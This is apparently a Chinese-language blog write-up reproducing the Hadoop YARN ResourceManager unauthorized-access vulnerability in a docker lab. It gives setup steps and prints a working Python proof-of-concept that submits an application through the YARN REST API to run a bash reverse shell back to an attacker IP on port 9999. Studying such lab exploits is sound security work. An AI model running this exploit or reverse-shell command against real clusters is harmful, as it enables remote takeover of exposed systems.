学习HadoopYARNResourceManager未授权访问漏洞

信息安全不简单鸭 2024-08-02 20:30:34

实验环境存在未授权访问,直接找到对应的接口,反弹shell。说实话,安全行业的水真的太深了,要学的太多了,这些未授权的接口咋就被人发现了呢?

ailx10

网络安全优秀回答者

网络安全硕士

去咨询

前提:准备好docker环境,下载好书籍配套实验环境,进入目录 ,开始复现漏洞

docker-compose build //可选docker-compose up -d

完成试验后,记得删除漏洞环境哦~~

docker-compose downdocker system prune -a -f //可选

简单访问一下,说明Hadoop YARN ResourceManager 未授权访问漏洞环境搭建成功了

步骤一:

步骤二:

shell到手:

利用过程如下:

在本地监听等待反弹 shell 连接调用 New Application API 创建 Application调用 Submit Application API 提交

也可以直接运行POC脚本,直接反弹shell

#!/usr/bin/env pythonimport requeststarget = 'http://144.34.162.13:8088/'lhost = '174.137.58.6' # put your local host ip here, and listen at port 9999url = target + 'ws/v1/cluster/apps/new-application'resp = requests.post(url)app_id = resp.json()['application-id']url = target + 'ws/v1/cluster/apps'data = { 'application-id': app_id, 'application-name': 'get-shell', 'am-container-spec': { 'commands': { 'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost, }, }, 'application-type': 'YARN',}requests.post(url, json=data)

在攻击机子上监听 9999 端口,成功拿到反弹shell

0 阅读:0

信息安全不简单鸭

简介:感谢大家的关注